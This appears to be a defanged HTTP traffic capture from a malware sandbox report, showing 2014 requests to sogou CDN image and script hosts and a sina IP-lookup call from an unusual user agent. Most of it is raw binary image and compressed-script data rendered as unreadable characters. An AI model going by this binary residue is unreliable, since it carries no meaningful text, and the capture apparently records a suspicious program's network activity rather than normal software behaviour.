...=L._...bqL'..Q*.W..3......J%...(AH....!AH....!AH....!AH....!A.i.".....i....G.yDx.......f.....m.......@.3.d6....pwZZZJ....H.......]]]...N.y...P.ekx.T|P........B.....LK.........X.....~...b......!AH....!AH....!AH....!AH....!AH....6.C....s...*....k......2...7O....Lu.?....,..9Sx..b.tv...P.C.F...c....7..y......6l.6...e6f..|....c(...N~P.F'A.E..A.X..:.(....'T*...@h.p.T..]G.!AH....!AH....!AH....!AH........n..<W.c...c.....&..w1.....{V....;.= .)hjjz
<<
<<< skipped >>>
GET /imgn/sehome/tjv1/img-news.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p3.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:32 GMT
Content-Type: image/gif
Content-Length: 225
Last-Modified: Fri, 11 Jan 2013 08:57:48 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:32 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89a.......................................................................................................!.......,..........^...dY"I"(...pl...$.0.|..6... .P..c..1....psF..TbZM......M${.S....Dj@.....f.lo...v%.fD...)..#.!.;....
GET /imgn/sehome/tjv1/img-video-2.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p3.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:32 GMT
Content-Type: image/gif
Content-Length: 225
Last-Modified: Wed, 15 May 2013 13:45:48 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:32 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89a.......................................................................................................!.......,..........^...di....J... .k..O.......cT..t.F.A(...@ ...TN.Tz| .*......R....>..e.<R..A6.....D'..@..')'.#.!.;HTTP/1.1 200 OK..Server: nginx/1.4.1..Date: Tue, 13 May 2014 04:49:32 GMT..Content-Type: image/gif..Content-Length: 225..Last-Modified: Wed, 15 May 2013 13:45:48 GMT..Connection: keep-alive..Expires: Thu, 12 Jun 2014 04:49:32 GMT..Cache-Control: max-age=2592000..Accept-Ranges: bytes..GIF89a.......................................................................................................!.......,..........^...di....J... .k..O.......cT..t.F.A(...@ ...TN.Tz| .*......R....>..e.<R..A6.....D'..@..')'.#.!.;..
GET /imgu/2014/05/20140508103513_537.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p4.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: image/gif
Content-Length: 21959
Last-Modified: Thu, 08 May 2014 02:35:13 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89ai......SSS.ww........\.......c;/.W...i......C.hhh.R......................................vE.....................-.......Z...bbb~~~.=.....]8....t...."*........dd.......A....S............%..............D..=....DDD.K.....kH.....h...................BB...)1.TZ........$$.SSJJJ.::...qqqdj..........\c..........4<......4vvv.,,.22.ZZ.......j ...................nn......ty.>>>....z\lll..........]#....KK.............qR.L$....f ............:B...x......................R,......yyyCJ............{.....b%-............mh...n7.....r...JQ.....a'.K..~O.6........}`.....c......lq....}............G.....R$.....p.E...b.....m~...V..^ .G...z..s.......vW.}Z.G.....P......~.Z0.............9..............D.@............yU.sM.@...i....77'/..>>.K..F.. ....\s..............XL.....w....,&..f.....h......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:491CD10DA3D5E311A958EE854ABCD7D0" xmpMM:DocumentID="xmp.did:4C40E5B5D5E411E3B4278899C73C6A8E" xmpMM:InstanceID="xmp.iid:4C40E5B4D5E411E3B4278899C73C6A8E" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9908CF
<<
<<< skipped >>>
GET /iplookup HTTP/1.1
User-Agent: mfc5002
Host: int.dpool.sina.com.cn
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Date: Tue, 13 May 2014 04:50:09 GMT
Server: Apache
Location: hXXp://int.dpool.sina.com.cn/iplookup/
Cache-Control: max-age=120
Expires: Tue, 13 May 2014 04:52:09 GMT
Content-Length: 246
Connection: close
Content-Type: text/html; charset=iso-8859-1
SINA-LB:aGEuMzguZzEuYngubGIuc2luYW5vZGUuY29t
SINA-TS:OTdjMmRlY2UgMjQwNSAyNDA2IDAgNiAyNwo=
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="hXXp://int.dpool.sina.com.cn/iplookup/">here</a>.</p>.</body></html>...
GET /imgn/tips/skin_tips_n1.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p8.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:26 GMT
Content-Type: image/gif
Content-Length: 1779
Last-Modified: Wed, 20 Jun 2012 04:23:22 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:26 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89af.!../......Z..R.....K...........P.....Y.....}.........................................^...........S...........l.....W..L........m...........f.........................................................!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:01801174072068119109DDF35EE18454" xmpMM:DocumentID="xmp.did:B01789E6890511E18530B51A3723DDED" xmpMM:InstanceID="xmp.iid:B01789E5890511E18530B51A3723DDED" xmp:CreatorTool="Adobe Photoshop CS5 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:02801174072068119109DDF35EE18454" stRef:documentID="xmp.did:01801174072068119109DDF35EE18454"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..................................................................................................................................~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:9876543210/.-, *)('&%$#"! .................................!...../.,....f.!......pH,...$q.l:...4i.....vK<<...xL.1>..y.... ........k/2...(..........{.........B.$)..........{!......./....................
<<
<<< skipped >>>
GET /imgu/2014/05/20140512170407_319.jpg HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p8.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:32 GMT
Content-Type: image/jpeg
Content-Length: 5937
Last-Modified: Mon, 12 May 2014 09:04:07 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:32 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
......JFIF.............0Exif..II*.......1...............VVV.meitu.com....C....................................................................C.......................................................................=._...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....|.-......d....Qg.u.Vz3......\..lD. .......hN........c.....s....mt....6...X73u.>.'8.v......i>.4w...V.R9..a.G....B.:..Zd..Sf.r%.5(.O........C1..A.:`.}.Z.&.B.OS...i..w...._..........o......u..7RQ. z. *.*...._...m....G..^4...[X......v.T...?&.i-...j.}^.....K.P.V..-...S.'.....,c.%...F...m...............A....Y.G8...WM*..q..,.y.9..../kB.jx...?.xg.w.....l.,.hnmgM.....v.V.]8%s.&.....j\)#..-....p.&9..z..J....e.....~8~..Z/.9...<..|V.K...(. .7x....<.mm..*.G.c..c...)...c.A..k........o...y....^;.|."...42k.u.....s....h.|..pk...I.rIBKV..#...a..u.W..|e...f...V.g...h.]Z...v.i...g'sq....q.y.I{._.}6.(....M.....E.5.-.B...4..........D^T}I. ..V.Yb%.....4.........3]K3.,...l.....C..c..g........w.?..<.....V x#..r.q.@........E..ua0...P..k.S...c......- I.<bMSP.C.......GB{._.c..n6.5...G..2........._..r...*.W.Wg....\.b.P....66...d...c.rJ......#.s.C.....O5....P.
<<
<<< skipped >>>
GET /v53/imgn/guide_tip.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:30 GMT
Content-Type: image/png
Content-Length: 10442
Last-Modified: Thu, 14 Nov 2013 11:00:56 GMT
Connection: keep-alive
Accept-Ranges: bytes
.PNG........IHDR.......J.......D.....tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5.1 Macintosh" xmpMM:InstanceID="xmp.iid:CEC0416D02FB11E388CB8B2E3040A42A" xmpMM:DocumentID="xmp.did:CEC0416E02FB11E388CB8B2E3040A42A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CEC0416B02FB11E388CB8B2E3040A42A" stRef:documentID="xmp.did:CEC0416C02FB11E388CB8B2E3040A42A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.Z....%<IDATx..].....&.(..."...ky......f...7..........W@%.`..@A.*(...P..;K......E|..;g.....?[....>.<.............i......h-....@_~.. _&.2%...<..........k......w.d./.....U 8..r./=|..9.{.P .IT.r.J.b].|...3|....../7....]1..=?..M]Y.f.....n...7l.:w......Vk?.gkk 8.z..........ps...^p........P-....Z..._.6l.....KWWW.jjj...........Q..P.~.|..Y..O......... .}...GI...3k..#......KS.....n..r.rm..../.....'JUUU..aIT....V......4...]P.......M.....Y..xju6...2...|.o3......?...>X\..V[[......}(//........o.CEM...f.N..Z.....O. ..7hU.qC=p&/........@.|'gA.1.>.$....{@t..P...um..A..8..].v.;..D.b.]..ss.
<<
<<< skipped >>>
GET /kan/static/css/DD_belatedPNG_0.0.8a-min.js?t= HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:22 GMT
Content-Type: application/x-javascript
Last-Modified: Tue, 27 Aug 2013 08:33:31 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
b9b.............Y.o....=...}mH....yx....vZ.p..q...P,....*I...........#@Lrvvvv.ofW...g......Hx-...... ........UQ.emk kq.CQiA^j'..k..n.2_e....x.kg.o......:....W.:.K[;-..v.'.(A}..8.5.D.....D..<..oW....uaO...-./.8..e*..Q.....H.)&...*.3[.Y3._.....Y%|...R.#..9.n..JJ..f...%..Y...O.Dh....A.id.....*..O7|n,..T.e."......d%...9.fg.e..Z...m..m..L..4O_'..>;<.>...X...*...33N....a.7...?....a....A....J...=M..T./.'.`.y5....8....{.20T.P......M....UKc.g....7.&[..]y.Hyu..^.WyP....].0c...z_?&.}$D=T.v..|.:.Zj'..tV.<f,\......cwU.....93Y.~......4"....O.8....U....!t.l9..e..~.....F..c.:.o...\...Zh....>..kWD..F...D...._%.w...06rs.&V./.&.y..#m.Vy../FS...b..)..g.H.%....n.,..Bs..t[}.........h.....s....B.......~....EFZ.E..z.;...G..'.Y.qV.?....;..%:o...........n.A.....^...y....[R.*.`.......I.3.. .U.x2W.....J..W....B..g..*....5.s.!.^4.. `{^z........h.....e.(Fc=B(..E..p.]c....R.eD...k.A:y...nd..c.Ã..z..Mr..-..:..L....&...W....z:7..d....d.)Gw.x..~5;..qR#..U.7.....H......{...v..)...I..v../....G6....yV....[..Ql....>.|}...a.dnn..f..|fL...'h......*J.'.W.d..(M. W[w8v.0..qY.....w@..d...b_....Z.........s....#!...(c..d...<.........$.....Y...:Z..... ..y..]....K)*.O.q.C=*.$..q.Gf.....*WY.......Z<..c.3.._`LDj....`.jDj..\0....<...xy.xN}..LK.G..5..3....5...|.3CS...,|.6...*.d...X).....Q6.BlQ.A...}....:.W..q......ad8bc.p.......n..;e.<L0 d....w...OG..<D....'..m....3.Q.....K=6.kK..5.....M.3..w.Z......[....#...N\.G$F.!.KS../y.:s......[.).c..h'uc....V`...(...@....../..j...."..C....pB.!.....f.Px.r..[p...R.......b..]u.I%.6|.NAXs.
<<
<<< skipped >>>
GET /imgn/v32/icon4.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:22 GMT
Content-Type: image/gif
Content-Length: 1506
Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT
Connection: keep-alive
Accept-Ranges: bytes
GIF89a".....................v.....Cs.`}..................................I{.b...........................................................U..m..r..........................M..Z..............................................................................................................................................................................................................mmm^^^QQQ777......!.....~.,....".......~....................................................................dKG8HINi.];K.D.kUMJ[.LG`....DIa.O9c.o|z.bKL.i8p.zy{x..G..OL....'@.>w.Y.....ox..).n..:..(.....oz...........XB.......9.3@.'...........5..H...5....m..HNk...4.... uYR...7.....Rj./J.H..d...p....d....5.(ybi..%<..f....Lk.4Y..M....<I..G..T2.eB%.. I.X..dI..T.R...m.6J.H...M.<?....CR..w~...T...<F?r....v...<.Rk....D.}<..1..<9........y..9t;z..S...B.....mU..1Ga.T.L...B...];..p.t....$r(..Oz...Ou8..$[...[d...%[ 1@M~.0.%T ..`N.....`....5aE}..)...,P..H&YD.%E...[,.@I.f....%.`C...`.......%..B.!x....,9..%. '.jv.A.a......y....)..}.`'..P...t.z(..4..76t.C.Y.P..If....h...=dP...0`*........*...d.@...ZA......)...$.Lq...&.....`@...p.."..A.!..B.S....)D;.....m.1L1A....n$.L...$@...>L....x..$).a(..L.........>B........H.....(..$...A..lp.....B..4...Pp..."D ..&k.r#.....<C...SL1...F....P.4.L7....F-.....@. 4.B...#p....dp...p`..S@1E.?..@%g..A.2....P.....4.@.'.PC.1....P.p.......z.^..!.....H2A....w.&.@.. L.B......&......`...BrC.f@..."....&<.)$u....g.....,.@..L.@..CP;..@ ..3Lr.?.=.`...h....,`v.).....: ...B^...,0...0..R...\b..PA.R`..xbkT
<<
<<< skipped >>>
GET /v53/imgn/v53_2icos.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: image/gif
Content-Length: 2051
Last-Modified: Thu, 14 Nov 2013 11:00:56 GMT
Connection: keep-alive
Accept-Ranges: bytes
GIF89a)....................8Y....................1..v...........=..............z....................e........J........}.................8..j..............u.................r.....Q..............C.................k...........L.............................................................................................................................................................................!.....N.,....).......NN5....................N.?N...........I.>.=......@..0.........N......-.......................<*........A..G.%:......#%% .C.......].....I!JP.....I..a.8....A$.3..B.H.$N\.a %#.#......I4L)..k...&O........{.(7.fN.:(P.pO.C.!..,.j.....D.'..6.G'A........u-z",..H....q...W.LI]d...J7..8. .O.x.*..l....Tl...... ..m<a.$.J...d..a...J...s$.$H..e..$^..9...D.........[k.`.Jbs.qk..nj..Yt........n...c.......uE'.c..n.Q_b.....)..x....d.....6e..V.)._c..'....W`...._{.}E.$.` ........,.....@..,.....)..W.M ..-....B.8#&..)...y..#..gb.#.|.. K6..*IJ.....R.3U:.%#..Rer_....P.8.9c.X...8..#_..&.jN.'B>..g.$....G...P1..&0.........MTIb. ....M8!.h........*.y`yZ.|.xG.Q6.)k.6.:J_..y.X}....-\..o.05k..L..)...........v.)..HK.H.....J.....4[.c.*Bn..9.^...[.xw.;...bGo......h.{o...[.%..Xo#...^..d S......~..r...*\....._.......@.b..&F...m...9.h..0..".*.(...:.....s..,..2.....!..l.#N.....4y..S32% cr..-bV.,...S.....6.....wn.9&.;LP7..a.wMlVy...W:....0..<. ../.2x{...(%V.[B.PM..TGu.yV.....$z^9v.J".....@.:0EB....:. ...]".PW....`.......PP..p..D.%..|...e..>)al....=.._.%...z..O...n..J.B.........>.....B....62....C.h.k....<@.....B.A...5..
<<
<<< skipped >>>
GET /v53/imgn/v53_arrow_h.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: image/gif
Content-Length: 1036
Last-Modified: Thu, 14 Nov 2013 11:00:56 GMT
Connection: keep-alive
Accept-Ranges: bytes
GIF89aQ.}..........1..b.......................C.....t.............................G...........j........}..T..................................................................................................!.....).,....Q.}........(....r.l:...0E.Z...v..z...xL.o...z}-..p.;N.W.......&. .z.waZ........z|W.........#.v.W.X!...u.)..Z$.$.q....\...{.U....[...j.....Z..........[....d...\....f...[. .i.).!X..e.....).......]Q0.........%..@$"(.8....t.b..q#.......e...C..\..%..B..|.sK..NPz..E.......8s....T..R.q.SYO9:..u...U?^......k.j.J...Bb..%....H`...jv......i...Z...~.\O.R..*x.B..R...(V..L..]4..<./.5."...q.d.....@ sT........k1..W.R[N...ws....p9.../n....Y.3'C....b*D..8M.........w......PM...N..-.}......b.~....w.}..h....WE}...`...W`9`=.!.U1x.n....\.]h.TU.". ."2.Z..aXF.m<U.s.)7..Z.H..Z...R..H..d...........6b]D...i....^U.x.`P.yW.m.uT..eya.t..#Gf...aj..Q......V..d.^....brE..|..e.y....".D.N>....C...N9E..M..1.I..*....j...r.. ...E".-...ZPb.&.pBk...@J....k.... -.l.....#........0..4.jP.5.\.-...#N.....:..#)@<..k.=.......K.A.....V8..D..,....l... ...;....
GET /ads_hz/_ads_2.js?t=777753 HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:24 GMT
Content-Type: application/x-javascript
Last-Modified: Tue, 13 May 2014 04:30:03 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
c11.............Y.s.H..W..=,- $0. ...v.W%.W.l.na.%.H(. z......G/ .....h.=3.....-;y8..(...' .B.e.......d.3*.i&.;Ag.q......tme\V.......py..eKi.....y..L.G....u.......s9P....la...._......_...b/.)H.j.....c.x. ..P...k.......B...."I.E.f....~.$Ul.....`!L#.o6.H.{....\yIx.'.T..an|N..^....[.MOfi.?1e.a..H.............:..y..U1.......Y.X.I..l..I..p.f..L.....v.@y....M.....$5....E.......2.s..V.J_..eh..Q......=..]....W..v*.9&[dY<.....Fn.C.A/~R].....S..q.-..`........Yv...`.{....r.<...~d.&5x.D.hY.(...{...t$....S.{.<..NJ..);mv.{n..'....l3w.......8[..h.#.h%.#!..Z^..|.%.i..^c.k?b........._.../h.v...i.......[.i%.....M...\.(.}/..{...[.N......u84..........v.X.2...^....wGf....#...p...Z....U..i>K.D.: ...0.z...L....l...U......`M.. y.T..m.v..Z.......D..M...&e]F`D..3.yre...V..l..)..L..m...L1...Fy........Z....^]V.l.."@(/ U.\....d...p.R=.sc..;|..s%.....d."......m.....6.d...N...H.~..Ck....jcW.qY..\'v.Uj...0.S.~.R..7.\x.#..;..N.4..m..r..Z{ny...o..a.7)...f.......?..~..:.......c.....J}...z'.%..I.pef...."....{.#......_.......W$%....V.....| |d....y.....Cv...........\..j.b..Z..s..b..u...".....A;%....cZk....8...L.o..V^...V......w0f[...D....P*.s.w...H.W...w'.[...B..#.oe...C.F.*4...RP.....(..)0{.F.x..P.i..)....../.....dLv.\........z....30.9.]f..g..,..~X.8..xf...$.C.9O|.........B..y.....6._m....p..>..O)8 ...!.b...0fL... .o..J......'W5..-.5...*n@.?R..4X..XQf V...Z...Q.PV.E1...E`.........J.}F.....W.ir.6.....\.u........."..(t{...zV...../......x2O...:..|....'...(Q..'....E~..x#...z.(.d..........h...3.....M..I".3 .uZ...U7]._....:....d[.e.#.YX..
<<
<<< skipped >>>
GET /imgn/v32/selogo_111207.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p4.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: image/png
Content-Length: 12155
Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR...a...?.....V.......pHYs................OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE...........Q,......!.........{.k........>...........H3Q5...B..........@..$p....d!s.#...~<< ".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I. .6a.a.@..y..2.4..............x.....6..._-...."bb.....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<......$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?....D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/.@.4.Qh..p...U..=p..a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9., .......3...!.[..b@q..S.(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._... .c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).)..4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.n.....^..Lo..y....}/.T.m...G.X...$.....<.5qo<./...QC].@C.a.a......<..F.F..i.\.$.m.m..&.&!&KM.M..RM..).;L;L........5.=1.2.......
<<
<<< skipped >>>
GET /imgn/v32/fbg_about.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p4.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:25 GMT
Content-Type: image/png
Content-Length: 3580
Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:25 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR.............&u2.....pHYs................OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE...........Q,......!.........{.k........>...........H3Q5...B..........@..$p....d!s.#...~<< ".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I. .6a.a.@..y..2.4..............x.....6..._-...."bb.....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<......$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?....D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/.@.4.Qh..p...U..=p..a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9., .......3...!.[..b@q..S.(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._... 